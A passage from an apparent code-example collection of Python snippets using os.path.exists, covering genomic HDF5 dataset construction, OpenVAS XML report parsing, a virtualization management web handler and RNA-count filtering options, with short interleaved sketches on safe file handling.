    testSize = np.floor(0.05*len(annot)*(x1+x2-options.width)/options.stride)
    # make sure that the sizes are integer multiple of chunk size
    trainSize -= (trainSize % options.chunkSize)
    testSize -= (testSize % options.chunkSize)
    trainSize = int(trainSize)
    testSize = int(testSize)
    print >> sys.stderr, '%d training sequences\n %d test sequences ' % (trainSize,testSize)

    # note that we have 1 channel and 4xoptions.width matrices for dna sequence.
    NStrainData = f.create_dataset("NStrainInp", (trainSize,2,1,options.width))
    MStrainData = f.create_dataset("MStrainInp", (trainSize,2,1,options.width))
    DStrainData = f.create_dataset("DStrainInp", (trainSize,4,1,options.width))
    RStrainData = f.create_dataset("RStrainInp", (trainSize,1,1,options.width))
    TFtrainData = f.create_dataset("TFtrainInp", (trainSize,2,1,options.width))

    trainTarget = f.create_dataset("trainOut", (trainSize,1,1,options.width))

    # note that we have 1 channel and 4xoptions.width matrices for dna sequence.
    NStestData = f.create_dataset("NStestInp", (testSize,2,1,options.width))
    MStestData = f.create_dataset("MStestInp", (testSize,2,1,options.width))
    DStestData = f.create_dataset("DStestInp", (testSize,4,1,options.width))
    RStestData = f.create_dataset("RStestInp", (testSize,1,1,options.width))
    TFtestData = f.create_dataset("TFtestInp", (testSize,2,1,options.width))

    testTarget = f.create_dataset("testOut", (testSize,1,1,options.width))

    info = f.create_dataset("info", (trainSize+testSize,4)) # chromosome no,  strand, index of the annotation, genomic position

    chrRange = annot['chr'].unique()
    # Use 4 channel and 1xoptions.width
    NSdata = np.zeros([options.chunkSize,2,1,options.width])
    MSdata = np.zeros([options.chunkSize,2,1,options.width])
    DSdata = np.zeros([options.chunkSize,4,1,options.width])
    RSdata = np.zeros([options.chunkSize,1,1,options.width])
    TFdata = np.zeros([options.chunkSize,2,1,options.width])
    target = np.zeros([options.chunkSize,1,1,options.width])

    infodata = np.zeros([options.chunkSize,4])

    qq = 0
    cc = 0
    ps = 0
    nestVar = 0
    debugMode = True

    # if options.species in ['YJ167','YJ168','YJ169','Scer','YSC001']:
    #     assembly = 'sacCer3'
    # elif options.species in ['YJ160']:
    #     assembly = 'Klla'
    # elif options.species in ['YJ177']:
    #     assembly = 'DeHa2'
    # else:
    #     raise('unknown species')

    print assembly
    gdb = genome.db.GenomeDB(path='/Users/umut/Projects/genome/data/share/genome_db',assembly=assembly)

    NSpos = gdb.open_track('NSpos')
    NSneg = gdb.open_track('NSneg')
    MSpos = gdb.open_track('MSpos')
    MSneg = gdb.open_track('MSneg')
    TFpos = gdb.open_track('TFpos')
    TFneg = gdb.open_track('TFneg')
    RS = gdb.open_track('RS')
    TSpos = gdb.open_track('TSpos')
    TSneg = gdb.open_track('TSneg')
    seq = gdb.open_track("seq")

    for chname in chrRange:
        if nestVar:
                break
        cc +=1
        tf = annot.chr==chname
        print 'doing %s' % (chname)

        for i in range(sum(tf)):
            if nestVar:
                break
            tss = annot[tf].tss.iloc[i]

            if annot[tf].strand.iloc[i]=="-":
                xran = range(tss-x2,tss+x1-options.width,options.stride)
            else:
                if tss<1000:
                    continue
                xran = range(tss-x1,tss+x2-options.width,options.stride)

            annotIdx = annot[tf].index[i]

            for pos in xran:
                if nestVar:
                    break
                seqVec = seq.get_seq_str(chname,pos+1,(pos+options.width))
                dsdata = vectorizeSequence(seqVec.lower())

                nsP = NSpos.get_nparray(chname,pos+1,(pos+options.width))
                nsN = NSneg.get_nparray(chname,pos+1,(pos+options.width))
                msP = MSpos.get_nparray(chname,pos+1,(pos+options.width))
                msN = MSneg.get_nparray(chname,pos+1,(pos+options.width))
                tfP = TFpos.get_nparray(chname,pos+1,(pos+options.width))
                tfN = TFneg.get_nparray(chname,pos+1,(pos+options.width))
                rs = RS.get_nparray(chname,pos+1,(pos+options.width))
                tsP = TSpos.get_nparray(chname,pos+1,(pos+options.width))
                tsN = TSneg.get_nparray(chname,pos+1,(pos+options.width))


                if debugMode:
                    if not checkData(np.r_[nsP,nsN,msP,msN,rs,tsP,tsN,tfP,tfN]):
                        print('NaN detected in chr' + chname + ' and at the position:' + str(pos))
                        # print nsmstsrsdata
                        # nestVar = 1;
                        continue

                if annot[tf].strand.iloc[i]=="+":
                    NSdata[qq,0,0,:] = nsP.T
                    NSdata[qq,1,0,:] = nsN.T
                    MSdata[qq,0,0,:] =msP.T
                    MSdata[qq,1,0,:] = msN.T
                    DSdata[qq,:,0,:] = dsdata.T
                    RSdata[qq,0,0,:] = rs.T
                    TFdata[qq,0,0,:] =tfP.T
                    TFdata[qq,1,0,:] = tfN.T
                    if sum(tsP)==0:
                        tsP = tsP + 1/np.float(options.width)
                    else:
                        tsP = tsP/sum(tsP+1e-5)
                    target[qq,0,0,:] =tsP.T
                    infodata[qq,:] = [cc, 1,annotIdx,pos]
                else:
                    NSdata[qq,0,0,:] = np.flipud(nsN).T
                    NSdata[qq,1,0,:] = np.flipud(nsP).T
                    MSdata[qq,0,0,:] = np.flipud(msN).T
                    MSdata[qq,1,0,:] = np.flipud(msP).T
                    RSdata[qq,0,0,:] = np.flipud(rs).T
                    DSdata[qq,:,0,:] = np.flipud(np.fliplr(dsdata)).T
                    TFdata[qq,0,0,:] = np.flipud(tfN).T
                    TFdata[qq,1,0,:] = np.flipud(tfP).T
                    if sum(tsN)==0:
                        tsN = tsN + 1/np.float(options.width)
                    else:
                        tsN = tsN/sum(tsN+1e-5)
                    target[qq,0,0,:] =np.flipud(tsN).T
                    infodata[qq,:] = [cc, -1,annotIdx,pos]

                qq+=1

                if ((ps+options.chunkSize) <= trainSize) and (qq>=options.chunkSize):
                    stp = options.chunkSize
                    NStrainData[range(ps,ps+stp),:,:,:] = NSdata
                    MStrainData[range(ps,ps+stp),:,:,:] = MSdata
                    DStrainData[range(ps,ps+stp),:,:,:] = DSdata
                    RStrainData[range(ps,ps+stp),:,:,:] = RSdata
                    TFtrainData[range(ps,ps+stp),:,:,:] = TFdata
                    trainTarget[range(ps,ps+stp),:,:,:] = target
                    info[range(ps,ps+stp),:] = infodata
                    NSdata = np.zeros([options.chunkSize,2,1,options.width])
                    MSdata = np.zeros([options.chunkSize,2,1,options.width])
                    DSdata = np.zeros([options.chunkSize,4,1,options.width])
                    RSdata = np.zeros([options.chunkSize,1,1,options.width])
                    infodata = np.zeros([options.chunkSize,4])
                    ps+=stp
                    qq=0
                    print >> sys.stderr, '%d  training chunk saved ' % ps
                if (ps >= trainSize) & (ps < (trainSize + testSize)) and (qq>=options.chunkSize):
                    NStestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = NSdata
                    MStestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = MSdata
                    DStestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = DSdata
                    RStestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = RSdata
                    TFtestData[range(ps-trainSize,ps-trainSize+stp),:,:,:] = TFdata
                    testTarget[range(ps-trainSize,ps-trainSize+stp),:,:,:] = target
                    info[range(ps,ps+stp),:] = infodata
                    rt = ps-trainSize
                    ps+=stp
                    qq=0
                    print >> sys.stderr, '%d  testing chunk saved ' % rt
                if ps >=(trainSize+testSize):
                    nestVar = 1;
                    break

    print ps
    f.close()
    NSpos.close()
    NSneg.close()
    MSpos.close()
    MSneg.close()
    RS.close()
    TFpos.close()
    TFneg.close()
    TSpos.close()
    TSneg.close()
    seq.close()
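
The script above uses the same exists-then-makedirs guard before opening its HDF5 output with h5py.File(..., "w"), a mode that silently truncates any file already at that path. A small sketch, assuming only the standard library (the helper name and the overwrite flag are illustrative, not part of FIDDLE), of an os.path.exists check that refuses to clobber an existing output file:

import os

def safe_output_path(directory, out_file, overwrite=False):
    # Build the target path and refuse to overwrite an existing file
    # unless the caller explicitly asks for it.
    path = os.path.join(directory, out_file)
    if os.path.exists(path) and not overwrite:
        raise IOError("refusing to overwrite existing file: %s" % path)
    return path

# e.g. f = h5py.File(safe_output_path("../../data/hdf5datasets", out_file), "w")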

Example 122

Project: golismero
Source File: __init__.py
View license
def report_parser(path_or_file, ignore_log_info=True):
	"""
    This function transforms an OpenVAS XML report file into OpenVASResult object structures.

    To pass a StringIO object as the parameter, do the following:
    >>> import StringIO
    >>> xml='<report extension="xml" type="scan" id="aaaa" content_type="text/xml" format_id="a994b278-1f62-11e1-96ac-406186ea4fc5"></report>'
    >>> f=StringIO.StringIO(xml)
    >>> report_parser(f)
    [OpenVASResult]

    To pass a file path:
    >>> xml_path='/home/my_user/openvas_result.xml'
    >>> report_parser(xml_path)
    [OpenVASResult]

    Language specification: http://www.openvas.org/omp-4-0.html

    :param path_or_file: path or file descriptor to xml file.
    :type path_or_file: str | file | StringIO

    :param ignore_log_info: Ignore Threats with Log and Debug info
    :type ignore_log_info: bool

    :raises: etree.ParseError, IOError, TypeError

    :return: list of OpenVASResult structures.
    :rtype: list(OpenVASResult)
    """
	if isinstance(path_or_file, str):
		if not os.path.exists(path_or_file):
			raise IOError("File %s not exits." % path_or_file)
		if not os.path.isfile(path_or_file):
			raise IOError("%s is not a file." % path_or_file)
	else:
		if not getattr(getattr(path_or_file, "__class__", ""), "__name__", "") in ("file", "StringIO", "StringO"):
			raise TypeError("Expected str or file, got '%s' instead" % type(path_or_file))

	# Parse XML file
	try:
		xml_parsed = etree.parse(path_or_file)
	except etree.ParseError:
		raise etree.ParseError("Invalid XML file. Ensure file is correct and all tags are properly closed.")

	# Use this check because the API does not expose the real class, so writing isinstance(xml_parsed, Element)
	# does not work
	if type(xml_parsed).__name__ == "Element":
		xml = xml_parsed
	elif type(xml_parsed).__name__ == "ElementTree":
		xml = xml_parsed.getroot()
	else:
		raise TypeError("Expected ElementTree or Element, got '%s' instead" % type(xml_parsed))

	# Check valid xml format
	if "id" not in xml.keys():
		raise ValueError("XML format is not valid, doesn't contains id attribute.")

	# Regex
	port_regex_specific = re.compile("([\w\d\s]*)\(([\d]+)/([\w\W\d]+)\)")
	port_regex_generic = re.compile("([\w\d\s]*)/([\w\W\d]+)")
	cvss_regex = re.compile("(cvss_base_vector=[\s]*)([\w:/]+)")
	vulnerability_IDs = ("cve", "bid", "bugtraq")

	m_return = []
	m_return_append = m_return.append

	# All the results
	for l_results in xml.findall(".//result"):
		l_partial_result = OpenVASResult()

		# Id
		l_vid = None
		try:
			l_vid = l_results.get("id")
			l_partial_result.id = l_vid
		except TypeError as e:
			logging.warning("%s is not a valid vulnerability ID, skipping vulnerability..." % l_vid)
			logging.debug(e)
			continue

		# --------------------------------------------------------------------------
		# Filter invalid vulnerability
		# --------------------------------------------------------------------------
		threat = l_results.find("threat")
		if threat is None:
			logging.warning("Vulnerability %s can't has 'None' as thread value, skipping vulnerability..." % l_vid)
			continue
		else:
			# Valid threat?
			if threat.text not in OpenVASResult.risk_levels:
				logging.warning("%s is not a valid risk level for %s vulnerability. skipping vulnerability..."
				                % (threat.text,
				                   l_vid))
				continue

		# Ignore log/debug messages, only get the results
		if threat.text in ("Log", "Debug") and ignore_log_info is True:
			continue

		# For each result
		for l_val in l_results.getchildren():

			l_tag = l_val.tag

			# --------------------------------------------------------------------------
			# Common properties: subnet, host, threat, raw_description
			# --------------------------------------------------------------------------
			if l_tag in ("subnet", "host", "threat"):
				# All of these text values can be processed the same way.
				try:
					setattr(l_partial_result, l_tag, l_val.text)
				except (TypeError, ValueError) as e:
					logging.warning(
						"%s is not a valid value for %s property in %s vulnerability. skipping vulnerability..."
						% (l_val.text,
						   l_tag,
						   l_partial_result.id))
					logging.debug(e)
					continue

			elif l_tag == "description":
				try:
					setattr(l_partial_result, "raw_description", l_val.text)
				except TypeError as e:
					logging.warning("%s is not a valid description for %s vulnerability. skipping vulnerability..."
					                % (l_val.text,
					                   l_vid))
					logging.debug(e)
					continue

			# --------------------------------------------------------------------------
			# Port
			# --------------------------------------------------------------------------
			elif l_tag == "port":

				# Looking for port as format: https (443/tcp)
				l_port = port_regex_specific.search(l_val.text)
				if l_port:
					l_service = l_port.group(1)
					l_number = int(l_port.group(2))
					l_proto = l_port.group(3)

					try:
						l_partial_result.port = OpenVASPort(l_service,
						                                    l_number,
						                                    l_proto)
					except (TypeError, ValueError) as e:
						logging.warning("%s is not a valid port for %s vulnerability. skipping vulnerability..."
						                % (l_val.text,
						                   l_vid))
						logging.debug(e)
						continue
				else:
					# Looking for port as format: general/tcp
					l_port = port_regex_generic.search(l_val.text)
					if l_port:
						l_service = l_port.group(1)
						l_proto = l_port.group(2)

						try:
							l_partial_result.port = OpenVASPort(l_service, 0, l_proto)
						except (TypeError, ValueError) as e:
							logging.warning("%s is not a valid port for %s vulnerability. skipping vulnerability..."
							                % (l_val.text,
							                   l_vid))
							logging.debug(e)
							continue

			# --------------------------------------------------------------------------
			# NVT
			# --------------------------------------------------------------------------
			elif l_tag == "nvt":

				# The NVT Object
				l_nvt_object = OpenVASNVT()
				try:
					l_nvt_object.oid = l_val.attrib['oid']
				except TypeError as e:
					logging.warning("%s is not a valid NVT oid for %s vulnerability. skipping vulnerability..."
					                % (l_val.attrib['oid'],
					                   l_vid))
					logging.debug(e)
					continue

				# Sub nodes of NVT tag
				l_nvt_symbols = [x for x in dir(l_nvt_object) if not x.startswith("_")]

				for l_nvt in l_val.getchildren():
					l_nvt_tag = l_nvt.tag

					# For each xml tag...
					if l_nvt_tag in l_nvt_symbols:

						# For tags with content, like: <cert>blah</cert>
						if l_nvt.text:

							# For filter tags like <cve>NOCVE</cve>
							if l_nvt.text.startswith("NO"):
								try:
									setattr(l_nvt_object, l_nvt_tag, "")
								except (TypeError, ValueError) as e:
									logging.warning(
										"Empty value is not a valid NVT value for %s property in %s vulnerability. skipping vulnerability..."
										% (l_nvt_tag,
										   l_vid))
									logging.debug(e)
									continue

							# Tags with valid content
							else:
								# --------------------------------------------------------------------------
								# Vulnerability IDs: CVE-..., BID..., BugTraq...
								# --------------------------------------------------------------------------
								if l_nvt_tag.lower() in vulnerability_IDs:
									l_nvt_text = getattr(l_nvt, "text", "")
									try:
										setattr(l_nvt_object, l_nvt_tag, l_nvt_text.split(","))
									except (TypeError, ValueError) as e:
										logging.warning(
											"%s value is not a valid NVT value for %s property in %s vulnerability. skipping vulnerability..."
											% (l_nvt_text,
											   l_nvt_tag,
											   l_vid))
										logging.debug(e)
									continue

								else:
									l_nvt_text = getattr(l_nvt, "text", "")
									try:
										setattr(l_nvt_object, l_nvt_tag, l_nvt_text)
									except (TypeError, ValueError) as e:
										logging.warning(
											"%s value is not a valid NVT value for %s property in %s vulnerability. skipping vulnerability..."
											% (l_nvt_text,
											   l_nvt_tag,
											   l_vid))
										logging.debug(e)
									continue

						# For filter tags without content, like: <cert/>
						else:
							try:
								setattr(l_nvt_object, l_nvt_tag, "")
							except (TypeError, ValueError) as e:
								logging.warning(
									"Empty value is not a valid NVT value for %s property in %s vulnerability. skipping vulnerability..."
									% (l_nvt_tag,
									   l_vid))
								logging.debug(e)
								continue

				# Get CVSS
				cvss_candidate = l_val.find("tags")
				if cvss_candidate is not None and getattr(cvss_candidate, "text", None):
					# Extract data
					cvss_tmp = cvss_regex.search(cvss_candidate.text)
					if cvss_tmp:
						l_nvt_object.cvss_base_vector = cvss_tmp.group(2) if len(cvss_tmp.groups()) >= 2 else ""

				# Add to the NVT Object
				try:
					l_partial_result.nvt = l_nvt_object
				except (TypeError, ValueError) as e:
					logging.warning(
						"NVT oid %s is not a valid NVT value for %s vulnerability. skipping vulnerability..."
						% (l_nvt_object.oid,
						   l_vid))
					logging.debug(e)
					continue

			# --------------------------------------------------------------------------
			# Unknown tags
			# --------------------------------------------------------------------------
			else:
				# Unrecognised tag
				logging.warning("%s tag unrecognised" % l_tag)

		# Add to the return values
		m_return_append(l_partial_result)

	return m_return
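
The docstring and the first branch of report_parser show the validation pattern this example relies on: a string argument must name an existing regular file, anything else must be file-like. A condensed sketch of that check, assuming only the standard library (the function name is illustrative, and the class-name comparison used by golismero is replaced here with a plain duck-typing test on read()):

import os

def validate_report_source(path_or_file):
    # Strings are treated as filesystem paths and must point at a real file.
    if isinstance(path_or_file, str):
        if not os.path.exists(path_or_file):
            raise IOError("File %s does not exist." % path_or_file)
        if not os.path.isfile(path_or_file):
            raise IOError("%s is not a file." % path_or_file)
    # Anything else only needs to behave like an open file.
    elif not hasattr(path_or_file, "read"):
        raise TypeError("Expected str or file-like object, got %r" % type(path_or_file))
    return path_or_file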

Example 123

Project: karesansui
Source File: guest.py
View license
    @auth
    def _GET(self, *param, **params):
        host_id = self.chk_hostby1(param)
        if host_id is None: return web.notfound()

        model = findbyhost1(self.orm, host_id)
        uris = available_virt_uris()

        #import pdb; pdb.set_trace()
        if model.attribute == MACHINE_ATTRIBUTE["URI"]:
            uri_guests = []
            uri_guests_status = {}
            uri_guests_kvg = {}
            uri_guests_info = {}
            uri_guests_name = {}
            segs = uri_split(model.hostname)
            uri = uri_join(segs, without_auth=True)
            creds = ''
            if segs["user"] is not None:
                creds += segs["user"]
                if segs["passwd"] is not None:
                    creds += ':' + segs["passwd"]

            # Output .part
            if self.is_mode_input() is not True:
                try:
                    self.kvc = KaresansuiVirtConnectionAuth(uri,creds)
                    host = MergeHost(self.kvc, model)
                    for guest in host.guests:

                        _virt = self.kvc.search_kvg_guests(guest.info["model"].name)
                        if 0 < len(_virt):
                            for _v in _virt:
                                uuid = _v.get_info()["uuid"]
                                uri_guests_info[uuid] = guest.info
                                uri_guests_kvg[uuid] = _v
                                uri_guests_name[uuid] = guest.info["model"].name.encode("utf8")

                    for name in sorted(uri_guests_name.values(),key=str.lower):
                        for uuid in dict_search(name,uri_guests_name):
                            uri_guests.append(MergeGuest(uri_guests_info[uuid]["model"], uri_guests_kvg[uuid]))
                            uri_guests_status[uuid]  = uri_guests_info[uuid]['virt'].status()

                finally:
                    self.kvc.close()

                # .json
                if self.is_json() is True:
                    guests_json = []
                    for x in uri_guests:
                        guests_json.append(x.get_json(self.me.languages))

                    self.view.uri_guests = json_dumps(guests_json)
                else:
                    self.view.uri_guests = uri_guests
                    self.view.uri_guests_status = uri_guests_status

        self.kvc = KaresansuiVirtConnection()
        try: # libvirt connection scope -->

            # Storage Pool
            #inactive_pool = self.kvc.list_inactive_storage_pool()
            inactive_pool = []
            active_pool = self.kvc.list_active_storage_pool()
            pools = inactive_pool + active_pool
            pools.sort()

            if not pools:
                return web.badrequest('No available storage pool was found.')

            # Output .input
            if self.is_mode_input() is True:
                self.view.pools = pools
                pools_info = {}
                pools_vols_info = {}
                pools_iscsi_blocks = {}
                already_vols = []
                guests = []

                guests += self.kvc.list_inactive_guest()
                guests += self.kvc.list_active_guest()
                for guest in guests:
                    already_vol = self.kvc.get_storage_volume_bydomain(domain=guest,
                                                                       image_type=None,
                                                                       attr='path')
                    if already_vol:
                        already_vols += already_vol.keys()

                for pool in pools:
                    pool_obj = self.kvc.search_kvn_storage_pools(pool)[0]
                    if pool_obj.is_active() is True:
                        pools_info[pool] = pool_obj.get_info()

                        blocks = None
                        if pools_info[pool]['type'] == 'iscsi':
                            blocks = self.kvc.get_storage_volume_iscsi_block_bypool(pool)
                            if blocks:
                                pools_iscsi_blocks[pool] = []
                        vols_obj = pool_obj.search_kvn_storage_volumes(self.kvc)
                        vols_info = {}

                        for vol_obj in vols_obj:
                            vol_name = vol_obj.get_storage_volume_name()
                            vols_info[vol_name] = vol_obj.get_info()
                            if blocks:
                                if vol_name in blocks and vol_name not in already_vols:
                                    pools_iscsi_blocks[pool].append(vol_obj.get_info())

                        pools_vols_info[pool] = vols_info

                self.view.pools_info = pools_info
                self.view.pools_vols_info = pools_vols_info
                self.view.pools_iscsi_blocks = pools_iscsi_blocks

                bridge_prefix = {
                    "XEN":"xenbr",
                    "KVM":KVM_BRIDGE_PREFIX,
                    }
                self.view.host_id = host_id
                self.view.DEFAULT_KEYMAP = DEFAULT_KEYMAP
                self.view.DISK_NON_QEMU_FORMAT = DISK_NON_QEMU_FORMAT
                self.view.DISK_QEMU_FORMAT = DISK_QEMU_FORMAT

                self.view.hypervisors = {}
                self.view.mac_address = {}
                self.view.keymaps = {}
                self.view.phydev = {}
                self.view.virnet = {}

                used_ports = {}

                for k,v in MACHINE_HYPERVISOR.iteritems():
                    if k in available_virt_mechs():
                        self.view.hypervisors[k] = v
                        uri = uris[k]
                        mem_info = self.kvc.get_mem_info()
                        active_networks = self.kvc.list_active_network()
                        used_graphics_ports = self.kvc.list_used_graphics_port()
                        bus_types = self.kvc.bus_types
                        self.view.bus_types = bus_types
                        self.view.max_mem = mem_info['host_max_mem']
                        self.view.free_mem = mem_info['host_free_mem']
                        self.view.alloc_mem = mem_info['guest_alloc_mem']

                        self.view.mac_address[k] = generate_mac_address(k)
                        self.view.keymaps[k] = eval("get_keymaps(%s_KEYMAP_DIR)" % k)

                        # Physical device
                        phydev = []
                        phydev_regex = re.compile(r"%s" % bridge_prefix[k])
                        for dev,dev_info in get_ifconfig_info().iteritems():
                            try:
                                if phydev_regex.match(dev):
                                    phydev.append(dev)
                            except:
                                pass
                        if len(phydev) == 0:
                            phydev.append("%s0" % bridge_prefix[k])
                        phydev.sort()
                        self.view.phydev[k] = phydev # Physical device

                        # Virtual device
                        self.view.virnet[k] = sorted(active_networks)
                        used_ports[k] = used_graphics_ports


                exclude_ports = []
                for k, _used_port in used_ports.iteritems():
                    exclude_ports = exclude_ports + _used_port
                    exclude_ports = sorted(exclude_ports)
                    exclude_ports = [p for p, q in zip(exclude_ports, exclude_ports[1:] + [None]) if p != q]
                self.view.graphics_port = next_number(GRAPHICS_PORT_MIN_NUMBER,
                                                 PORT_MAX_NUMBER,
                                                 exclude_ports)

            else: # .part
                models = findbyhost1guestall(self.orm, host_id)
                guests = []
                if models:
                    # Physical Guest Info
                    self.view.hypervisors = {}
                    for model in models:
                        for k,v in MACHINE_HYPERVISOR.iteritems():
                            if k in available_virt_mechs():
                                self.view.hypervisors[k] = v
                                uri = uris[k]
                                if hasattr(self, "kvc") is not True:
                                    self.kvc = KaresansuiVirtConnection(uri)
                                domname = self.kvc.uuid_to_domname(model.uniq_key)
                                #if not domname: return web.conflict(web.ctx.path)
                                _virt = self.kvc.search_kvg_guests(domname)
                                if 0 < len(_virt):
                                    guests.append(MergeGuest(model, _virt[0]))
                                else:
                                    guests.append(MergeGuest(model, None))

                # Exported Guest Info
                exports = {}
                for pool_name in pools:
                    files = []

                    pool = self.kvc.search_kvn_storage_pools(pool_name)
                    path = pool[0].get_info()["target"]["path"]

                    if os.path.exists(path):
                        for _afile in glob.glob("%s/*/info.dat" % (path,)):
                            param = ExportConfigParam()
                            param.load_xml_config(_afile)

                            _dir = os.path.dirname(_afile)

                            uuid = param.get_uuid()
                            name = param.get_domain()
                            created = param.get_created()
                            title = param.get_title()
                            if title != "":
                                title = re.sub("[\r\n]","",title)
                            if title == "":
                                title = _('untitled')

                            if created != "":
                                created_str = time.strftime("%Y/%m/%d %H:%M:%S", \
                                                            time.localtime(float(created)))
                            else:
                                created_str = _("N/A")

                            files.append({"dir": _dir,
                                          "pool" : pool_name,
                                          #"b64dir" : base64_encode(_dir),
                                          "uuid" : uuid,
                                          "name" : name,
                                          "created" : int(created),
                                          "created_str" : created_str,
                                          "title" : title,
                                          "icon" : param.get_database()["icon"],
                                          })

                    exports[pool_name] = files

                # .json
                if self.is_json() is True:
                    guests_json = []
                    for x in guests:
                        guests_json.append(x.get_json(self.me.languages))

                    self.view.guests = json_dumps(guests_json)
                else:
                    self.view.exports = exports
                    self.view.guests = guests

            return True
        except:
            pass
        finally:
            #self.kvc.close()
            pass # libvirt connection scope --> Guest#_post()
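
Near the end of the handler above, os.path.exists guards a glob over <pool path>/*/info.dat before the export metadata is parsed. A minimal sketch of that scan in isolation, assuming only the standard library (the function name is illustrative and not part of the karesansui API):

import glob
import os

def list_export_descriptors(pool_path):
    # glob.glob already returns [] for a missing directory, but the explicit
    # exists() check mirrors the guard above and makes the intent obvious.
    if not os.path.exists(pool_path):
        return []
    return sorted(glob.glob(os.path.join(pool_path, "*", "info.dat")))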

Example 124

Project: cgat
Source File: counts2counts.py
View license
def main(argv=None):
    """script main.

    parses command line options in sys.argv, unless *argv* is given.
    """

    if not argv:
        argv = sys.argv

    # setup command line parser
    parser = E.OptionParser(version="%prog version: $Id$",
                            usage=globals()["__doc__"])

    parser.add_option("-d", "--design-tsv-file", dest="input_filename_design",
                      type="string",
                      help="input file with experimental design "
                      "[default=%default].")

    parser.add_option("-m", "--method", dest="method", type="choice",
                      choices=("filter", "spike", "normalize"),
                      help="differential expression method to apply "
                      "[default=%default].")

    parser.add_option("--filter-min-counts-per-row",
                      dest="filter_min_counts_per_row",
                      type="int",
                      help="remove rows with less than this "
                      "number of counts in total [default=%default].")

    parser.add_option("--filter-min-counts-per-sample",
                      dest="filter_min_counts_per_sample",
                      type="int",
                      help="remove samples with a maximum count per sample of "
                      "less than this numer   [default=%default].")

    parser.add_option("--filter-percentile-rowsums",
                      dest="filter_percentile_rowsums",
                      type="int",
                      help="remove percent of rows with "
                      "lowest total counts [default=%default].")

    parser.add_option("--spike-change-bin-min", dest="min_cbin",
                      type="float",
                      help="minimum bin for change bins [default=%default].")

    parser.add_option("--spike-change-bin-max", dest="max_cbin",
                      type="float",
                      help="maximum bin for change bins [default=%default].")

    parser.add_option("--spike-change-bin-width", dest="width_cbin",
                      type="float",
                      help="bin width for change bins [default=%default].")

    parser.add_option("--spike-initial-bin-min", dest="min_ibin",
                      type="float",
                      help="minimum bin for initial bins[default=%default].")

    parser.add_option("--spike-initial-bin-max", dest="max_ibin",
                      type="float",
                      help="maximum bin for intitial bins[default=%default].")

    parser.add_option("--spike-initial-bin-width", dest="width_ibin",
                      type="float",
                      help="bin width intitial bins[default=%default].")

    parser.add_option("--spike-minimum", dest="min_spike",
                      type="int",
                      help="minimum number of spike-ins required within each bin\
                      [default=%default].")

    parser.add_option("--spike-maximum", dest="max_spike",
                      type="int",
                      help="maximum number of spike-ins allowed within each bin\
                      [default=%default].")

    parser.add_option("--spike-difference-method", dest="difference",
                      type="choice",
                      choices=("relative", "logfold", "abs_logfold"),
                      help="method to use for calculating difference\
                      [default=%default].")

    parser.add_option("--spike-iterations", dest="iterations", type="int",
                      help="number of iterations to generate spike-ins\
                      [default=%default].")

    parser.add_option("--spike-cluster-maximum-distance",
                      dest="cluster_max_distance", type="int",
                      help="maximum distance between adjacent loci in cluster\
                      [default=%default].")

    parser.add_option("--spike-cluster-minimum-size",
                      dest="cluster_min_size", type="int",
                      help="minimum number of loci required per cluster\
                      [default=%default].")

    parser.add_option("--spike-type",
                      dest="spike_type", type="choice",
                      choices=("row", "cluster"),
                      help="spike in type [default=%default].")

    parser.add_option("--spike-subcluster-min-size",
                      dest="min_sbin", type="int",
                      help="minimum size of subcluster\
                      [default=%default].")

    parser.add_option("--spike-subcluster-max-size",
                      dest="max_sbin", type="int",
                      help="maximum size of subcluster\
                      [default=%default].")

    parser.add_option("--spike-subcluster-bin-width",
                      dest="width_sbin", type="int",
                      help="bin width for subcluster size\
                      [default=%default].")

    parser.add_option("--spike-output-method",
                      dest="output_method", type="choice",
                      choices=("append", "seperate"),
                      help="defines whether the spike-ins should be appended\
                      to the original table or seperately [default=%default].")

    parser.add_option("--spike-shuffle-column-suffix",
                      dest="shuffle_suffix", type="string",
                      help="the suffix of the columns which are to be shuffled\
                      [default=%default].")

    parser.add_option("--spike-keep-column-suffix",
                      dest="keep_suffix", type="string",
                      help="a list of suffixes for the columns which are to be\
                      keep along with the shuffled columns[default=%default].")

    parser.add_option("--normalization-method",
                      dest="normalization_method", type="choice",
                      choices=("deseq-size-factors",
                               "total-count",
                               "total-column",
                               "total-row"),
                      help="normalization method to apply [%default]")

    parser.add_option("-t", "--tags-tsv-file", dest="input_filename_tags",
                      type="string",
                      help="input file with tag counts [default=%default].")

    parser.set_defaults(
        input_filename_tags="-",
        method="filter",
        filter_min_counts_per_row=None,
        filter_min_counts_per_sample=None,
        filter_percentile_rowsums=None,
        output_method="seperate",
        difference="logfold",
        spike_type="row",
        min_cbin=0,
        max_cbin=100,
        width_cbin=100,
        min_ibin=0,
        max_ibin=100,
        width_ibin=100,
        max_spike=100,
        min_spike=None,
        iterations=1,
        cluster_max_distance=100,
        cluster_min_size=10,
        min_sbin=1,
        max_sbin=1,
        width_sbin=1,
        shuffle_suffix=None,
        keep_suffix=None,
        normalization_method="deseq-size-factors"
    )

    # add common options (-h/--help, ...) and parse command line
    (options, args) = E.Start(parser, argv=argv, add_output_options=True)

    # load
    if options.keep_suffix:
        # if using a suffix, loadTagDataPandas will throw an error as it
        # looks for column names which exactly match the design
        # "tracks"; need to write a function in Counts.py to handle
        # counts table and design table + suffix
        counts = pd.read_csv(options.stdin, sep="\t",  comment="#")
        inf = IOTools.openFile(options.input_filename_design)
        design = pd.read_csv(inf, sep="\t", index_col=0)
        inf.close()
        design = design[design["include"] != 0]

        if options.method in ("filter", "spike"):
            if options.input_filename_design is None:
                raise ValueError("method '%s' requires a design file" %
                                 options.method)
    else:
        # create Counts object
        # TS if spike type is cluster, need to keep "contig" and "position"
        # columns out of index
        if options.spike_type == "cluster":
            index = None
        else:
            index = 0
        if options.input_filename_tags == "-":
            counts = Counts.Counts(pd.io.parsers.read_csv(
                options.stdin, sep="\t", index_col=index, comment="#"))
        else:
            counts = Counts.Counts(
                IOTools.openFile(options.input_filename_tags, "r"),
                sep="\t", index_col=index, comment="#")

        # TS normalization doesn't require a design table
        if not options.method == "normalize":

            assert options.input_filename_design and os.path.exists(
                options.input_filename_design)

            # create Design object
            design = Expression.ExperimentalDesign(
                pd.read_csv(
                    IOTools.openFile(options.input_filename_design, "r"),
                    sep="\t", index_col=0, comment="#"))

    if options.method == "filter":

        assert (options.filter_min_counts_per_sample is not None or
                options.filter_min_counts_per_row is not None or
                options.filter_percentile_rowsums is not None), \
            "no filtering parameters have been suplied"

        # filter
        # remove sample with low counts
